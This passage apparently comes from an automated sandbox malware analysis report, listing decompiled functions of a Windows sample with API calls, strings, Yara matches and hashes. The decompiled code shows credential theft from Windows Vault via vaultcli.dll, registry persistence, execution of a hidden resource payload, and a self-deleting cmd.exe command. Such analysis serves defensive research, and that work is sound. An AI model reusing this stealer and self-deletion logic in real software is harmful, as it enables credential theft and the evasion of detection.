                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateInstance$FreeInitializeTaskUninitialize
                                                                    • String ID: Grabber$Source$vids
                                                                    • API String ID: 533512943-4200688928
                                                                    • Opcode ID: 76718ab0f42efa8d609ab3c40372d3f5520edf75e93f052e0c744eebd1ed0a03
                                                                    • Instruction ID: eb629e34342c58b951bd5ab31ce29d2e38f7a6ef95705f28a42ee0225918af47
                                                                    • Opcode Fuzzy Hash: 76718ab0f42efa8d609ab3c40372d3f5520edf75e93f052e0c744eebd1ed0a03
                                                                    • Instruction Fuzzy Hash: 87516E71A00219AFDB14DFA4C898EAEB7B9FF54309F048498F905AB350CB719D09CF60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00408B30 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 122COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00408B67
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00408B6F
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00408BF8
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00408C23
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00408C78
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm$}@
                                                                    • API String ID: 1170836740-46996059
                                                                    • Opcode ID: 4cd76b12f01c8d82d8437f0c305f07ec6d8027105e77cf593ddfea1b485b80de
                                                                    • Instruction ID: 353043568e44341f1ffa93875867a5f43d3469eac26e56b1b565287b3a54fa84
                                                                    • Opcode Fuzzy Hash: 4cd76b12f01c8d82d8437f0c305f07ec6d8027105e77cf593ddfea1b485b80de
                                                                    • Instruction Fuzzy Hash: 1241E574A00208ABCF10DF69C984A9F7BB5EF44318F14816EF8546B3D2DB79A911CF99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D12961 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 108processthreadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 80%
                                                                    			E02D12961() {
				char _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v92;
				char _v352;
				char _v816;
				char _v817;
				char _v872;
				void* _t63;
				void* _t70;
				void* _t73;

				_t63 = _t70;
				_t73 = _t63;
				E02D20F31(_t73 + 0x10);
				if( *((intOrPtr*)(_t73 + 0x68)) != 0) {
					TerminateThread( *0x2e5cbec, 0);
				}
				if( *((intOrPtr*)(_t73 + 0x50)) != 0) {
					E02D2106C(_t73 + 4,  *((intOrPtr*)(_t73 + 8)), _t73 + 0x14, 0x20006, 0);
					E02D1362D( &_v8, _t73 + 0x54);
					E02D20F4C(_t73 + 4,  &_v8);
					E02D15EA5(_v8);
					E02D20FAE(_t73 + 4);
				}
				E02D11052( &_v92, 0, 0x44);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				GetModuleFileNameA(0,  &_v352, 0x104);
				E02D1102C( &_v872, "cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q ", 0x37);
				E02D1102C( &_v817, "\"", 1);
				E02D1102C( &_v816,  &_v352, E02D11133( &_v352));
				E02D1102C(E02D11133( &_v352) + 0x38 +  &_v872, "\"", 2);
				CreateProcessA(0,  &_v872, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
				CloseHandle(_v24.hThread);
				CloseHandle(_v24);
				ExitProcess(0);
			}













                                                                    0x02d12961
                                                                    0x02d21728
                                                                    0x02d2172d
                                                                    0x02d21737
                                                                    0x02d21740
                                                                    0x02d21740
                                                                    0x02d21749
                                                                    0x02d2175d
                                                                    0x02d21769
                                                                    0x02d21774
                                                                    0x02d2177c
                                                                    0x02d21783
                                                                    0x02d21783
                                                                    0x02d2178f
                                                                    0x02d21799
                                                                    0x02d2179d
                                                                    0x02d217a3
                                                                    0x02d217a4
                                                                    0x02d217ad
                                                                    0x02d217c1
                                                                    0x02d217d5
                                                                    0x02d217f5
                                                                    0x02d21815
                                                                    0x02d21837
                                                                    0x02d21846
                                                                    0x02d2184b
                                                                    0x02d2184e

                                                                    APIs
                                                                      • Part of subcall function 02D20F31: RegDeleteKeyW.ADVAPI32(80000001,?), ref: 02D20F38
                                                                    • TerminateThread.KERNEL32(00000000,?,?), ref: 02D21740
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 02D217AD
                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 02D21837
                                                                    • CloseHandle.KERNEL32(?), ref: 02D21846
                                                                    • CloseHandle.KERNEL32(?), ref: 02D2184B
                                                                    • ExitProcess.KERNEL32 ref: 02D2184E
                                                                    Strings
                                                                    • cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q , xrefs: 02D217BB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandleProcess$CreateDeleteExitFileModuleNameTerminateThread
                                                                    • String ID: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
                                                                    • API String ID: 3630425516-84290196
                                                                    • Opcode ID: a17272a6ea81dbbe299e57eafe1dc731728a11c976fa3a8a1f4234ce8d2ca323
                                                                    • Instruction ID: 899bbea896035bd0687cd8f5ef1c83dbb02fc95dab64f2b4ba349db67703f7be
                                                                    • Opcode Fuzzy Hash: a17272a6ea81dbbe299e57eafe1dc731728a11c976fa3a8a1f4234ce8d2ca323
                                                                    • Instruction Fuzzy Hash: 343141B1D00628FBDB11EAE0DD85EDEB77EEF54305F104465B605A2640D774EE58CEA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1B559 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 54libraryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 94%
                                                                    			E02D1B559(void* __ecx) {
				struct HINSTANCE__* _t17;
				intOrPtr _t21;
				intOrPtr _t24;
				void* _t27;
				void* _t45;

				_t27 = __ecx;
				_t45 = __ecx;
				_t17 = LoadLibraryA("vaultcli.dll");
				 *(_t45 + 0xc0) = _t17;
				_t46 = _t17;
				if(_t17 == 0) {
					L7:
					__eflags = 0;
					return 0;
				} else {
					_push(_t27);
					 *((intOrPtr*)(_t45 + 0x8c)) = E02D20969(_t17, "VaultOpenVault", _t46);
					 *((intOrPtr*)(_t45 + 0x90)) = E02D20969( *(_t45 + 0xc0), "VaultCloseVault", _t46);
					_t21 = E02D20969( *(_t45 + 0xc0), "VaultEnumerateItems", _t46);
					_t43 = "VaultGetItem";
					 *((intOrPtr*)(_t45 + 0x94)) = _t21;
					 *((intOrPtr*)(_t45 + 0x98)) = E02D20969( *(_t45 + 0xc0), "VaultGetItem", _t46);
					 *((intOrPtr*)(_t45 + 0x9c)) = E02D20969( *(_t45 + 0xc0), _t43, _t46);
					_t24 = E02D20969( *(_t45 + 0xc0), "VaultFree", _t46);
					 *((intOrPtr*)(_t45 + 0xa0)) = _t24;
					if( *((intOrPtr*)(_t45 + 0x8c)) == 0 ||  *((intOrPtr*)(_t45 + 0x94)) == 0 ||  *((intOrPtr*)(_t45 + 0x90)) == 0 ||  *((intOrPtr*)(_t45 + 0x98)) == 0 || _t24 == 0) {
						goto L7;
					} else {
						return 1;
					}
				}
			}








                                                                    0x02d1b559
                                                                    0x02d1b55f
                                                                    0x02d1b561
                                                                    0x02d1b567
                                                                    0x02d1b56d
                                                                    0x02d1b56f
                                                                    0x02d1b623
                                                                    0x02d1b623
                                                                    0x02d1b626
                                                                    0x02d1b575
                                                                    0x02d1b576
                                                                    0x02d1b58e
                                                                    0x02d1b5a4
                                                                    0x02d1b5aa
                                                                    0x02d1b5b5
                                                                    0x02d1b5bc
                                                                    0x02d1b5cf
                                                                    0x02d1b5e5
                                                                    0x02d1b5eb
                                                                    0x02d1b5f3
                                                                    0x02d1b600
                                                                    0x00000000
                                                                    0x02d1b61e
                                                                    0x02d1b622
                                                                    0x02d1b622
                                                                    0x02d1b600

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(vaultcli.dll,00000000,02D1B229), ref: 02D1B561
                                                                      • Part of subcall function 02D20969: lstrcmpA.KERNEL32(?,02D21BD0,?,open,02D21BD0), ref: 02D209A2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LibraryLoadlstrcmp
                                                                    • String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                                    • API String ID: 2493137890-3967309459
                                                                    • Opcode ID: 75603769e0e4975594e5ee26527bbca7da63d32ca8ae270e509e090c18290131
                                                                    • Instruction ID: 3e5e76d177bb83e0629ef2c18c50cef50bd422877c240f3c3ec5f996562eaf56
                                                                    • Opcode Fuzzy Hash: 75603769e0e4975594e5ee26527bbca7da63d32ca8ae270e509e090c18290131
                                                                    • Instruction Fuzzy Hash: 0311E934A01711CFE7289B71B444BA7B6E6EBB4219F54492FC49B97740DB70AC05CF10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D219C9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49registrystringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D219C9(void* __ecx) {
				void* _v8;
				int _v12;
				short* _t16;

				_t16 = L"SOFTWARE\\_rptls";
				if(RegOpenKeyExW(0x80000001, _t16, 0, 0xf003f,  &_v8) != 0) {
					RegCreateKeyExW(0x80000001, _t16, 0, 0, 0, 0xf003f, 0,  &_v8,  &_v12);
				}
				RegSetValueExW(_v8, L"Install", 0, 1, 0x2e5cbf0, lstrlenW(0x2e5cbf0) << 2);
				return RegCloseKey(_v8);
			}






                                                                    0x02d219dd
                                                                    0x02d219f1
                                                                    0x02d21a06
                                                                    0x02d21a06
                                                                    0x02d21a28
                                                                    0x02d21a3b

                                                                    APIs
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,000F003F,?,00000208,02E5CBF0,?,?,?,?,02D21A78), ref: 02D219E9
                                                                    • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,00000000,00000000,000F003F,00000000,?,?,?,?,?,?,02D21A78), ref: 02D21A06
                                                                    • lstrlenW.KERNEL32(02E5CBF0,?,?,?,?,02D21A78,?,?,?,?,02D157B9,?,00000000,00000000), ref: 02D21A12
                                                                    • RegSetValueExW.ADVAPI32(?,Install,00000000,00000001,02E5CBF0,00000000,?,?,?,?,02D21A78,?,?,?,?,02D157B9), ref: 02D21A28
                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,02D21A78,?,?,?,?,02D157B9,?,00000000,00000000), ref: 02D21A31
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseCreateOpenValuelstrlen
                                                                    • String ID: Install$SOFTWARE\_rptls
                                                                    • API String ID: 2036214137-3226779556
                                                                    • Opcode ID: 3dfa5586978db0a744b2306e5b751557dadc9a0ba22c423f4f4def7426b48b64
                                                                    • Instruction ID: 471d39798f9980dd561fe08f45449bd9ba3a7b9999e292e3c040fce1ba27cb07
                                                                    • Opcode Fuzzy Hash: 3dfa5586978db0a744b2306e5b751557dadc9a0ba22c423f4f4def7426b48b64
                                                                    • Instruction Fuzzy Hash: C5F0AF72940028BFE7305692ED4DEEB7F7CEF96755B110069FD05E2201C6605E58C6B0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D21A3C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 88%
                                                                    			E02D21A3C(void* __ebx, void* __ecx, void* __eflags) {
				long _t2;
				void* _t8;
				struct HINSTANCE__* _t13;
				void* _t15;
				struct HRSRC__* _t18;

				_t15 = __ecx;
				E02D11052(0x2e5cbf0, 0, 0x208);
				_t2 = GetModuleFileNameW(0, 0x2e5cbf0, 0x208);
				__imp__#680();
				if(_t2 == 0 && E02D1FBFC() != 1) {
					E02D219C9(_t15);
					_t13 = E02D21CA2(_t15);
					_t18 = FindResourceW(_t13, 0x66, L"WM_DSP");
					_t8 = LoadResource(_t13, _t18);
					SizeofResource(_t13, _t18);
					if(LockResource(_t8) != 0) {
						E02D21936(_t10);
					}
				}
				return 0;
			}








                                                                    0x02d21a3c
                                                                    0x02d21a4c
                                                                    0x02d21a58
                                                                    0x02d21a5e
                                                                    0x02d21a66
                                                                    0x02d21a73
                                                                    0x02d21a82
                                                                    0x02d21a8d
                                                                    0x02d21a91
                                                                    0x02d21a9b
                                                                    0x02d21aab
                                                                    0x02d21aaf
                                                                    0x02d21aaf
                                                                    0x02d21aab
                                                                    0x02d21ab8

                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(00000000,02E5CBF0,00000208,00000000,00000000,?,?,?,02D157B9,?,00000000,00000000), ref: 02D21A58
                                                                    • IsUserAnAdmin.SHELL32 ref: 02D21A5E
                                                                      • Part of subcall function 02D1FBFC: GetCurrentProcess.KERNEL32(00000008,00000000,745D0770,00000000,745D0770,00000000,?,?,?,?,02D235AB,?), ref: 02D1FC0E
                                                                      • Part of subcall function 02D1FBFC: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02D235AB,?), ref: 02D1FC15
                                                                      • Part of subcall function 02D1FBFC: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,02D235AB,?), ref: 02D1FC33
                                                                      • Part of subcall function 02D1FBFC: FindCloseChangeNotification.KERNEL32(00000000), ref: 02D1FC48
                                                                      • Part of subcall function 02D219C9: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,000F003F,?,00000208,02E5CBF0,?,?,?,?,02D21A78), ref: 02D219E9
                                                                      • Part of subcall function 02D219C9: RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,00000000,00000000,000F003F,00000000,?,?,?,?,?,?,02D21A78), ref: 02D21A06
                                                                      • Part of subcall function 02D219C9: lstrlenW.KERNEL32(02E5CBF0,?,?,?,?,02D21A78,?,?,?,?,02D157B9,?,00000000,00000000), ref: 02D21A12
                                                                      • Part of subcall function 02D219C9: RegSetValueExW.ADVAPI32(?,Install,00000000,00000001,02E5CBF0,00000000,?,?,?,?,02D21A78,?,?,?,?,02D157B9), ref: 02D21A28
                                                                      • Part of subcall function 02D219C9: RegCloseKey.ADVAPI32(?,?,?,?,?,02D21A78,?,?,?,?,02D157B9,?,00000000,00000000), ref: 02D21A31
                                                                    • FindResourceW.KERNEL32(00000000,00000066,WM_DSP,?,?,?,?,02D157B9,?,00000000,00000000), ref: 02D21A87
                                                                    • LoadResource.KERNEL32(00000000,00000000,?,?,?,?,02D157B9,?,00000000,00000000,?,?,?,?,?,?), ref: 02D21A91
                                                                    • SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,02D157B9,?,00000000,00000000,?,?,?,?,?,?), ref: 02D21A9B
                                                                    • LockResource.KERNEL32(00000000,?,?,?,?,02D157B9,?,00000000,00000000,?,?,?,?,?,?,00000000), ref: 02D21AA2
                                                                      • Part of subcall function 02D21936: VirtualProtect.KERNEL32(00000000,000007D0,00000040,00000000,00000000,00000000,?,00000000,?,02D21AB4,?,?,?,02D157B9,?,00000000), ref: 02D21974
                                                                      • Part of subcall function 02D21936: VirtualAlloc.KERNEL32(00000000,000001FE,00001000,00000040,?,00000000,?,02D21AB4,?,?,?,02D157B9,?,00000000,00000000), ref: 02D21988
                                                                      • Part of subcall function 02D21936: GetWindowsDirectoryW.KERNEL32(00000000,00000104,?,00000000,?,02D21AB4,?,?,?,02D157B9,?,00000000,00000000), ref: 02D21996
                                                                      • Part of subcall function 02D21936: lstrlenW.KERNEL32(00000000,\System32\cmd.exe,00000028,?,00000000,?,02D21AB4,?,?,?,02D157B9,?,00000000,00000000), ref: 02D219A4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Resource$CloseFindOpenProcessTokenVirtuallstrlen$AdminAllocChangeCreateCurrentDirectoryFileInformationLoadLockModuleNameNotificationProtectSizeofUserValueWindows
                                                                    • String ID: WM_DSP
                                                                    • API String ID: 88121427-506093727
                                                                    • Opcode ID: c71db1a19e6e0abdca08b5a3673541217b20658578dfb8aae4721c67568e5c4e
                                                                    • Instruction ID: fd18556d9c1d334837fb267f0183f9f285352250306e2b8377e565095f2c9361
                                                                    • Opcode Fuzzy Hash: c71db1a19e6e0abdca08b5a3673541217b20658578dfb8aae4721c67568e5c4e
                                                                    • Instruction Fuzzy Hash: 29F04F31A802706BE63127B26C0CF5B3E5DEFB5754F164824F80AE6341DA24CD19CA70
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D15CA3 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 20libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 68%
                                                                    			E02D15CA3(void* __ecx) {
				_Unknown_base(*)()* _t2;
				void* _t4;

				_t4 = __ecx;
				_t2 = GetProcAddress(LoadLibraryA("USER32.DLL"), "MessageBoxA");
				if(_t4 == 0) {
					if(_t2 != 0) {
						_t2 =  *_t2(0, "An assertion condition failed", "Assert", 0x2010);
					}
					ExitProcess(1);
				}
				return _t2;
			}





                                                                    0x02d15ca9
                                                                    0x02d15cb7
                                                                    0x02d15cc0
                                                                    0x02d15cc4
                                                                    0x02d15cd7
                                                                    0x02d15cd7
                                                                    0x02d15cdb
                                                                    0x02d15cdb
                                                                    0x02d15ce1

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(USER32.DLL,?,02D202E1,?,745D0770,00000000), ref: 02D15CAB
                                                                    • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 02D15CB7
                                                                    • ExitProcess.KERNEL32 ref: 02D15CDB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressExitLibraryLoadProcProcess
                                                                    • String ID: An assertion condition failed$Assert$MessageBoxA$USER32.DLL
                                                                    • API String ID: 881411216-1361702557
                                                                    • Opcode ID: 6a1dffd3aa7b0f0f11ac8898351fb4a235a2aacccea797cb5b1069c3e3d8f705
                                                                    • Instruction ID: fdcef744b8dad763464a0d4946da0dacc6c85f809844cf9666f87511ebaea090
                                                                    • Opcode Fuzzy Hash: 6a1dffd3aa7b0f0f11ac8898351fb4a235a2aacccea797cb5b1069c3e3d8f705
                                                                    • Instruction Fuzzy Hash: F3D02B34BC03E07AFA2016B13C0AF547B046BB0F0DF004400BE03E1381C7918C6CD910
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D15F6A Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 14libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 68%
                                                                    			E02D15F6A() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("USER32.DLL"), "MessageBoxA");
				if(_t2 != 0) {
					 *_t2(0, "A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application", "PureCall", 0x2010);
				}
				ExitProcess(1);
			}




                                                                    0x02d15f7b
                                                                    0x02d15f83
                                                                    0x02d15f96
                                                                    0x02d15f96
                                                                    0x02d15f9a

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(USER32.DLL), ref: 02D15F6F
                                                                    • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 02D15F7B
                                                                    • ExitProcess.KERNEL32 ref: 02D15F9A
                                                                    Strings
                                                                    • PureCall, xrefs: 02D15F8A
                                                                    • A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application, xrefs: 02D15F8F
                                                                    • USER32.DLL, xrefs: 02D15F6A
                                                                    • MessageBoxA, xrefs: 02D15F75
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressExitLibraryLoadProcProcess
                                                                    • String ID: A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application$MessageBoxA$PureCall$USER32.DLL
                                                                    • API String ID: 881411216-4134947204
                                                                    • Opcode ID: 19a1a5bdcc80d28e7ac5158d1ed4f98568c67903859a9fdd446be5411d36371e
                                                                    • Instruction ID: cc0e2645a9f474af9e4fa991a3b1a29602f6f698511bb3fe387d1fc7c0535e6c
                                                                    • Opcode Fuzzy Hash: 19a1a5bdcc80d28e7ac5158d1ed4f98568c67903859a9fdd446be5411d36371e
                                                                    • Instruction Fuzzy Hash: 96D09230BD03A16EF62026B27C0AF18BB14AB75E0AF014810BE06E43C1CAD09C6C9965
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00412149 Relevance: 12.2, APIs: 8, Instructions: 197COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0040BB8E,0040BB8E,?,?,?,00412363,00000001,00000001,34E85006), ref: 004121A3
                                                                    • __alloca_probe_16.LIBCMT ref: 004121CB
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,00000000,?,?,?,00412363,00000001,00000001,34E85006,?,?,?), ref: 0041220C
                                                                    • __alloca_probe_16.LIBCMT ref: 0041228F
                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,34E85006,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 004122EC
                                                                    • __freea.LIBCMT ref: 004122F9
                                                                      • Part of subcall function 0040DD7A: RtlAllocateHeap.NTDLL(00000000,?), ref: 0040DDAC
                                                                    • __freea.LIBCMT ref: 00412302
                                                                    • __freea.LIBCMT ref: 00412327
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 3864826663-0
                                                                    • Opcode ID: efec82012d2cd9db57c8827eafeaba0415fb012290e3458dfa75d1294d147459
                                                                    • Instruction ID: efc175e8e115c704ad55d3fe277ea89c601e30820dd367b8e6caf77afcf072de
                                                                    • Opcode Fuzzy Hash: efec82012d2cd9db57c8827eafeaba0415fb012290e3458dfa75d1294d147459
